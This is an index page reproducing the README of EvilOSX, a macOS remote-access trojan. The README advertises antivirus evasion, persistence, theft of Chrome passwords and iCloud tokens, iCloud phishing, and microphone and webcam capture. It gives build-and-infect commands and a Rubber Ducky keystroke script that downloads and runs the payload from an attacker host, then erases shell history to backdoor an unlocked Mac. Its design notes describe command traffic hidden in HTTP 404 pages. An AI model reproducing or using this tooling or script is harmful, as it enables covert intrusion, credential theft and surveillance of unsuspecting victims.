Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/Marten4n6/EvilOSX

An evil RAT (Remote Administration Tool) for macOS / OS X.
https://github.com/Marten4n6/EvilOSX

backdoor mac macos macosx osx pentesting post-exploitation python python3 rat reverse-shell

Last synced: 6 days ago
JSON representation

An evil RAT (Remote Administration Tool) for macOS / OS X.

Awesome Lists containing this project

README 

        


  


  Logo

  


  EvilOSX

  





An evil RAT (Remote Administration Tool) for macOS / OS X.





  

      License

  

  

      Python

  

  

    Issues

  

  

      Build Status

  

  

      Contributing

  




---



[Marco Generator](https://github.com/cedowens/EvilOSX_MacroGenerator) by Cedric Owens



### This project is no longer active



## Features

- Emulate a terminal instance

- Simple extendable [module](https://github.com/Marten4n6/EvilOSX/blob/master/CONTRIBUTING.md) system

- No bot dependencies (pure python)

- Undetected by anti-virus (OpenSSL [AES-256](https://en.wikipedia.org/wiki/Advanced_Encryption_Standard) encrypted payloads)

- Persistent

- GUI and CLI support

- Retrieve Chrome passwords

- Retrieve iCloud tokens and contacts

- Retrieve/monitor the clipboard

- Retrieve browser history (Chrome and Safari)

- [Phish](https://i.imgur.com/x3ilHQi.png) for iCloud passwords via iTunes

- iTunes (iOS) backup enumeration

- Record the microphone

- Take a desktop screenshot or picture using the webcam

- Attempt to get root via local privilege escalation



## How To Use



```bash

# Clone or download this repository

$ git clone https://github.com/Marten4n6/EvilOSX



# Go into the repository

$ cd EvilOSX



# Install dependencies required by the server

$ sudo pip install -r requirements.txt



# Start the GUI

$ python start.py



# Lastly, run a built launcher on your target(s)

```



**Warning:** Because payloads are created unique to the target system (automatically by the server), the server must be running when any bot connects for the first time.



### Advanced users



There's also a CLI for those who want to use this over SSH:

```bash

# Create a launcher to infect your target(s)

$ python start.py --builder



# Start the CLI

$ python start.py --cli --port 1337



# Lastly, run a built launcher on your target(s)

```



## Screenshots



![CLI](https://i.imgur.com/DGYCQMl.png)

![GUI](https://i.imgur.com/qw3k4z4.png)



## Motivation

This project was created to be used with my [Rubber Ducky](https://hakshop.com/products/usb-rubber-ducky-deluxe), here's the simple script:

```

REM Download and execute EvilOSX @ https://github.com/Marten4n6/EvilOSX

REM See also: https://ducktoolkit.com/vidpid/



DELAY 1000

GUI SPACE

DELAY 500

STRING Termina

DELAY 1000

ENTER

DELAY 1500



REM Kill all terminals after x seconds

STRING screen -dm bash -c 'sleep 6; killall Terminal'

ENTER



STRING cd /tmp; curl -s HOST_TO_EVILOSX.py -o 1337.py; python 1337.py; history -cw; clear

ENTER

```

- It takes about 10 seconds to backdoor any unlocked Mac, which is...... *nice*

- Termina**l** is spelt that way intentionally, on some systems spotlight won't find the terminal otherwise. 


- To bypass the keyboard setup assistant make sure you change the VID&PID which can be found [here](https://ducktoolkit.com/vidpid/). 


  Aluminum Keyboard (ISO) is probably the one you are looking for.



## Versioning

EvilOSX will be maintained under the Semantic Versioning guidelines as much as possible. 


Server and bot releases will be numbered with the follow format:

```

..

```



And constructed with the following guidelines:

- Breaking backward compatibility (with older bots) bumps the major

- New additions without breaking backward compatibility bumps the minor

- Bug fixes and misc changes bump the patch



For more information on SemVer, please visit https://semver.org/.



## Design Notes

- Infecting a machine is split up into three parts:

  * A **launcher** is run on the target machine whose only goal is to run the stager

  * The stager asks the server for a **loader** which handles how a payload will be loaded

  * The loader is given a uniquely encrypted **payload** and then sent back to the stager

- The server hides it's communications by sending messages hidden in HTTP 404 error pages (from BlackHat's "Hiding In Plain Sight")

  * Command requests are retrieved from the server via a GET request

  * Command responses are sent to the server via a POST request

- Modules take advantage of python's dynamic nature, they are simply sent over the network compressed with [zlib](https://www.zlib.net), along with any configuration options

- Since the bot only communicates with the server and never the other way around, the server has no way of knowing when a bot goes offline



## Issues

Feel free to submit any issues or feature requests [here](https://github.com/Marten4n6/EvilOSX/issues).



## Contributing

For a simple guide on how to create modules click [here](https://github.com/Marten4n6/EvilOSX/blob/master/CONTRIBUTING.md).



## Credits

- The awesome [Empire](https://github.com/EmpireProject) project

- Shoutout to [Patrick Wardle](https://twitter.com/patrickwardle) for his awesome talks, check out [Objective-See](https://objective-see.com/)

- manwhoami for his projects: OSXChromeDecrypt, MMeTokenDecrypt, iCloudContacts 


  (now deleted... let me know if you reappear)

- The slowloris module is pretty much copied from [PySlowLoris](https://github.com/ProjectMayhem/PySlowLoris)

- [urwid](http://urwid.org/) and [this code](https://github.com/izderadicka/xmpp-tester/blob/master/commander.py) which saved me a lot of time with the CLI

- Logo created by [motusora](https://www.behance.net/motusora)



## License

[GPLv3](https://github.com/Marten4n6/EvilOSX/blob/master/LICENSE.txt)